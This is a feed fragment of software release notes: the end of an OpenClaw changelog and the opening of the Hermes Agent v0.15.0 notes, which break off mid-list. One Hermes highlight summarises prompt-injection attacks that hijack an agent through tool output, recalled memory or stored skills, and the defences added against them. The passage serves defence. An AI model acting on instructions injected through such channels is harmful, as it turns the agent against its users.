href="https://github.com/openclaw/openclaw/pull/87399">#87399</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534684461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87375" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87375/hovercard" href="https://github.com/openclaw/openclaw/pull/87375">#87375</a>)</li>
<li>Channel delivery and session identity got safer across outbound plugin hooks, Matrix room ids, iMessage reactions/approvals, Slack final replies, Discord recovered tool warnings, and Microsoft Teams service URL trust checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345081037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73706/hovercard" href="https://github.com/openclaw/openclaw/pull/73706">#73706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364693778" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75670/hovercard" href="https://github.com/openclaw/openclaw/issues/75670">#75670</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534435733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87366" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87366/hovercard" href="https://github.com/openclaw/openclaw/pull/87366">#87366</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536461472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87451/hovercard" href="https://github.com/openclaw/openclaw/pull/87451">#87451</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533570288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87334" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87334/hovercard" href="https://github.com/openclaw/openclaw/pull/87334">#87334</a>)</li>
<li>Mobile and chat surfaces got a broader refresh: the iOS Pro UI, Gateway chat transport, onboarding, Talk permissions, WebChat reconnect delivery, and session picker behavior now preserve more state across reconnects and empty searches. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534475516" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87367" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87367/hovercard" href="https://github.com/openclaw/openclaw/pull/87367">#87367</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537867197" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87531" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87531/hovercard" href="https://github.com/openclaw/openclaw/pull/87531">#87531</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541460557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87682" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87682/hovercard" href="https://github.com/openclaw/openclaw/pull/87682">#87682</a>)</li>
<li>CLI, auth, doctor, and provider paths fail faster and recover more clearly: malformed numeric/version options are rejected, OAuth and local service startup requests are bounded, legacy <code>api_key</code> auth profiles migrate to canonical form, and restart guidance is actionable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535278756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87398" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87398/hovercard" href="https://github.com/openclaw/openclaw/pull/87398">#87398</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513750971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86281" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86281/hovercard" href="https://github.com/openclaw/openclaw/pull/86281">#86281</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534263190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87361/hovercard" href="https://github.com/openclaw/openclaw/pull/87361">#87361</a>)</li>
<li>Plugin and Gateway hot paths do less repeated work while preserving cache correctness for install records, config JSON parsing, tool search catalogs, session stores, manifest model rows, auto-enabled plugin config, browser tokens, and viewer assets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520495731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86699" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86699/hovercard" href="https://github.com/openclaw/openclaw/pull/86699">#86699</a>)</li>
<li>Release, QA, and E2E validation now bound more log, artifact, harness, and cross-OS waits so failing lanes produce proof instead of hanging or false-greening.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Status: show active subagent details in status output.</li>
<li>Diffs: split the default language pack and expand default Diffs language coverage while keeping the host floor aligned. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534535212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87370" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87370/hovercard" href="https://github.com/openclaw/openclaw/pull/87370">#87370</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534563692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87372" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87372/hovercard" href="https://github.com/openclaw/openclaw/pull/87372">#87372</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>ClawHub: add plugin display names plus skill verification and trust surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534140530" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87354" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87354/hovercard" href="https://github.com/openclaw/openclaw/pull/87354">#87354</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520495731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86699" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86699/hovercard" href="https://github.com/openclaw/openclaw/pull/86699">#86699</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thewilloftheshadow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thewilloftheshadow">@thewilloftheshadow</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>iOS: refresh the dev app with Pro Command, Chat, Agents, and Settings tabs wired to gateway sessions, diagnostics, chat, and realtime Talk. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534475516" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87367" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87367/hovercard" href="https://github.com/openclaw/openclaw/pull/87367">#87367</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Docs: clarify Codex computer-use setup, paste-token stdin auth setup, macOS gateway sleep troubleshooting, native Codex hook relay recovery, container model auth, install deployment cards, device-token admin gating, and backport targets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533118068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87313" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87313/hovercard" href="https://github.com/openclaw/openclaw/pull/87313">#87313</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223303633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63050" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63050/hovercard" href="https://github.com/openclaw/openclaw/pull/63050">#63050</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bdjben/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bdjben">@bdjben</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liaoandi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liaoandi">@liaoandi</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thewilloftheshadow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thewilloftheshadow">@thewilloftheshadow</a>.</li>
<li>PDF/tools: use ClawPDF for PDF extraction and surface MCP structured content in agent tool results. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541241418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87670" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87670/hovercard" href="https://github.com/openclaw/openclaw/pull/87670">#87670</a>)</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents: fall back to local config pruning when the optional <code>agents delete</code> Gateway probe cannot authenticate, so offline installs can still delete agents without removing shared workspaces.</li>
<li>Tighten phone-control mutation authorization [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529379329" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87150" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87150/hovercard" href="https://github.com/openclaw/openclaw/pull/87150">#87150</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Clarify directive persistence authorization policy [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515051227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86369" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86369/hovercard" href="https://github.com/openclaw/openclaw/pull/86369">#86369</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Agents/Codex: keep spawned agent cwd/workspace state separated, keep hook context prompt-local, release session locks on timeout abort, avoid session event queue self-wait, preserve shared app-server state across startup or helper failures, keep native hook relay alive across restarts, route workspace memory through tools, resolve Codex runtime models first, report quarantined dynamic tools, format <code>skills</code> command output, and bound compaction/steering retries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4530733870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87218/hovercard" href="https://github.com/openclaw/openclaw/pull/87218">#87218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523882966" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86875" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86875/hovercard" href="https://github.com/openclaw/openclaw/pull/86875">#86875</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4512236257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86123" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86123/hovercard" href="https://github.com/openclaw/openclaw/pull/86123">#86123</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535300059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87399" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87399/hovercard" href="https://github.com/openclaw/openclaw/pull/87399">#87399</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534684461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87375" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87375/hovercard" href="https://github.com/openclaw/openclaw/pull/87375">#87375</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534791510" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87383" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87383/hovercard" href="https://github.com/openclaw/openclaw/pull/87383">#87383</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535326369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87400" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87400/hovercard" href="https://github.com/openclaw/openclaw/pull/87400">#87400</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Alix-007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Alix-007">@Alix-007</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjf">@sjf</a>.</li>
<li>Channels: thread canonical session keys into outbound hooks, preserve Matrix room-id case, keep fallback tool warnings mention-inert, retain delivered Slack final replies during late cleanup, continue iMessage polling after denied reactions, suppress duplicate native exec approvals, preserve Telegram SecretRef prompt config, suppress Discord recovered tool warnings, and block untrusted Teams service URLs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345081037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73706/hovercard" href="https://github.com/openclaw/openclaw/pull/73706">#73706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364693778" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75670/hovercard" href="https://github.com/openclaw/openclaw/issues/75670">#75670</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534435733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87366" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87366/hovercard" href="https://github.com/openclaw/openclaw/pull/87366">#87366</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536461472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87451/hovercard" href="https://github.com/openclaw/openclaw/pull/87451">#87451</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533570288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87334" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87334/hovercard" href="https://github.com/openclaw/openclaw/pull/87334">#87334</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeroaltitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeroaltitude">@zeroaltitude</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lukeboyett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lukeboyett">@lukeboyett</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaotian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaotian">@xiaotian</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>CLI/auth/doctor/providers: reject malformed numeric/timeout/subcommand-version inputs, wait for respawn child shutdown, bound Codex and GitHub Copilot OAuth/token requests, warm provider auth off the main thread, honor Codex response timeouts, bound local service startup, resolve GPT-5.5 without cached catalog, migrate legacy memory auto-provider config, rewrite non-canonical <code>api_key</code> auth profiles, and make doctor restart follow-ups actionable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535278756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87398" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87398/hovercard" href="https://github.com/openclaw/openclaw/pull/87398">#87398</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513750971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86281" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86281/hovercard" href="https://github.com/openclaw/openclaw/pull/86281">#86281</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534263190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87361/hovercard" href="https://github.com/openclaw/openclaw/pull/87361">#87361</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alkor2000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alkor2000">@alkor2000</a>.</li>
<li>Gateway/security/session state: expire browser tokens after auth rotation, scope assistant idempotency dedupe, drain probe client closes, avoid stale restart continuation reuse, preserve retry-after fallbacks, bound webchat image and artifact transcript scans, include seconds in inbound metadata timestamps, and evict current plugin-state namespaces at row caps.</li>
<li>Config/parsing/network: reject partial numeric parsing, parse provider/Discord retry headers and dates strictly, honor IPv6 and bare IPv6 <code>no_proxy</code> entries, canonicalize secret target array indexes, and reject malformed media content lengths, inspected TCP ports, marketplace content lengths, cron epochs, and sandbox stat fields.</li>
<li>Providers/agents: preserve seeded Anthropic signatures, concatenate signature-delta chunks, preserve DeepSeek <code>reasoning_content</code> replay across tier suffixes, apply OpenRouter strict9 ids to Mistral routes, promote Ollama plain-text tool calls, and recover empty preflight compaction. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539098619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87593/hovercard" href="https://github.com/openclaw/openclaw/pull/87593">#87593</a>)</li>
<li>File transfer: handle late tar stdin pipe errors after archive validation or unpacking has already settled.</li>
<li>Performance: trust install-record caches between reloads, prefer native JSON parsing, reuse unchanged tool-search catalogs, skip unchanged store serialization, add precomputed session patch writers, reduce store clone allocations, cache manifest model catalog rows and auto-enabled plugin config, and slim current metadata identity caches.</li>
<li>Docker/release/QA: package runtime workspace templates, stream cross-OS served artifacts, preserve sparse Crabbox run artifacts, bound OpenClaw instance logs, plugin gauntlet relay logs, MCP channel buffers, kitchen-sink scans, agent-turn assertions, and release scenario logs, and keep release/google live guards current.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.15.0 (2026.5.28) — The Velocity Release]]></title>
<description><![CDATA[Hermes Agent v0.15.0 (v2026.5.28)
Release Date: May 28, 2026
Since v0.14.0: 1,302 commits · 747 merged PRs · 1,746 files changed · 282,712 insertions · 36,699 deletions · 560+ issues closed (15 P0, 65 P1, 19 security-tagged) · 321 community contributors (including co-authors)

The Velocity Releas...]]></description>
<link>https://tsecurity.de/de/3555164/downloads/hermes-agent-v0150-2026528-the-velocity-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555164/downloads/hermes-agent-v0150-2026528-the-velocity-release/</guid>
<pubDate>Thu, 28 May 2026 20:01:31 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.15.0 (v2026.5.28)</h1>
<p><strong>Release Date:</strong> May 28, 2026<br>
<strong>Since v0.14.0:</strong> 1,302 commits · 747 merged PRs · 1,746 files changed · 282,712 insertions · 36,699 deletions · 560+ issues closed (15 P0, 65 P1, 19 security-tagged) · 321 community contributors (including co-authors)</p>
<blockquote>
<p><strong>The Velocity Release.</strong> Hermes gets dramatically faster — to start, to run, to ship work, and to grow. The 16,083-line <code>run_agent.py</code> collapses to 3,821 (-76%) across 14 cohesive <code>agent/*</code> modules. Kanban grew into a real multi-agent platform across 104 PRs — orchestrator auto-decomposition, swarm topology, scheduled tasks, worktree-per-task, per-task model overrides. The cold-start perf wave keeps going: another second shaved off launch, 47% fewer per-conversation function calls, <code>hermes --version</code> flipping the head-to-head benchmark against Codex CLI. <code>session_search</code> is 4,500× faster and free now. Promptware defense lands against Brainworm-class attacks. Bitwarden Secrets Manager replaces N per-provider API keys with one bootstrap token. Skill bundles let one slash command load a whole workflow. The Ink TUI gets a multi-session orchestrator. Two new image_gen providers (Krea 2 Medium + Large, FAL ported to plugin), the Nous-approved MCP catalog with an interactive picker, an OpenHands orchestration skill, ntfy as the 23rd messaging platform, and a deep xAI integration round (Web Search plugin, xai-oauth <code>hermes proxy</code> upstream, retired-May-15 model detection + <code>hermes migrate xai</code>, natural TTS speech-tag pauses, base_url leak guard, OpenAI-style execution guidance for Grok). 15 P0 + 65 P1 closures alongside.</p>
</blockquote>
<hr>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>The Big Refactor — <code>run_agent.py</code> is no longer 16,000 lines</strong> — The file at the heart of Hermes — the agent conversation loop — has been reduced from 16,083 lines to 3,821 (-76%), with the extracted code redistributed across 14 cohesive modules under <code>agent/</code>. Behavior is unchanged: every extraction keeps a thin forwarder on <code>AIAgent</code>, every test patch path still works, every external caller is compatible. The reason you care: future Hermes development moves faster, plugin authors can finally grep the codebase, and the file that took 90 seconds to load in your editor opens in a blink. (<a href="https://github.com/NousResearch/hermes-agent/pull/27248" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27248/hovercard">#27248</a>)</p>
</li>
<li>
<p><strong>Kanban grew into a real multi-agent platform — 104 PRs end to end</strong> — Triage auto-decomposes one task into a tree of sub-tasks. <code>hermes kanban swarm</code> creates a full Swarm v1 graph in one command — root, parallel workers, gated verifier, gated synthesizer, shared blackboard. Tasks support per-task model overrides (cheap models for boilerplate, expensive ones for hard sub-tasks), board-level default workdirs, per-task worktree paths and branches, scheduled start times, configurable claim TTL, retry fingerprinting, stale-task detection, respawn guards, and a drag-to-delete trash zone. Workers report through <code>/workers/active</code>, <code>/runs/{id}</code>, and <code>/inspect</code> endpoints. (<a href="https://github.com/NousResearch/hermes-agent/pull/27572" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27572/hovercard">#27572</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28443" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28443/hovercard">#28443</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28364" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28364/hovercard">#28364</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28394" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28394/hovercard">#28394</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28462" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28462/hovercard">#28462</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28384" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28384/hovercard">#28384</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28467" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28467/hovercard">#28467</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28455" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28455/hovercard">#28455</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28452" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28452/hovercard">#28452</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28432" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28432/hovercard">#28432</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28468" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28468/hovercard">#28468</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28420" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28420/hovercard">#28420</a>)</p>
</li>
<li>
<p><strong>Cold-start perf wave keeps going — another second saved, 47% fewer per-turn function calls</strong> — Three new optimization rounds: defer <code>openai._base_client</code> import (-240ms / -17MB on every CLI invocation), hot-path optimizations cut 47% of per-conversation function calls (399k → 213k for 31-turn chat), defer compression-feasibility check (-170 to -290ms on every agent construction), adaptive subprocess polling (-195ms per tool call, 1+ second per turn). Termux cold start drops from 2.9s to 0.8s. <code>hermes --version</code> cold drops 63% (701ms → 258ms), flipping the head-to-head benchmark against Codex CLI from 5/11 wins to 6/11. (<a href="https://github.com/NousResearch/hermes-agent/pull/28864" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28864/hovercard">#28864</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28866/hovercard">#28866</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28957" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28957/hovercard">#28957</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/29006" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29006/hovercard">#29006</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/29419" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29419/hovercard">#29419</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/30121" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30121/hovercard">#30121</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/30609" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30609/hovercard">#30609</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/31968" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31968/hovercard">#31968</a>)</p>
</li>
<li>
<p><strong><code>session_search</code> rebuilt — no LLM, no cost, 4,500× faster</strong> — The old <code>session_search</code> was an aux-LLM-powered tool that cost ~$0.30/call and took ~30 seconds to summarize three sessions, sometimes confabulating when the right session wasn't even in the FTS5 hit list. The new shape is one tool with three modes (discovery, scroll, browse) inferred from which args are set — no <code>mode</code> parameter, no aux-LLM, no config knob, no companion skill. Discovery is ~20ms instead of ~90s; scroll is ~1ms. Searching your past sessions for context is now free and instant. (<a href="https://github.com/NousResearch/hermes-agent/pull/27590" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27590/hovercard">#27590</a>)</p>
</li>
<li>
<p><strong>Promptware defense — Brainworm-class attacks blocked at three chokepoints</strong> — Inspired by recent Brainworm / Promptware Kill Chain research (Origin HQ, arxiv 2601.09625), Hermes now defends the context window against prompt-injection attacks that try to hijack the agent via tool output, recalled memory, or stored skills. Single source of truth (<code>tools/threat_patterns.py</code>) with ~15 new Brainworm/C2 patterns; recalled memory is scanned at load time; tool results get delimiter markers so a malicious file or remote service can't impersonate Hermes' own system content. Paired with a new <code>security-guidance</code> plugin that pattern-matches dangerous code writes. (<a href="https://github.com/NousResearch/hermes-agent/pull/32269" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32269/hovercard">#32269</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/33131" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33131/hovercard">#33131</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/9151" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/9151/hovercard">#9151</a>)</p>
</li>
<li>
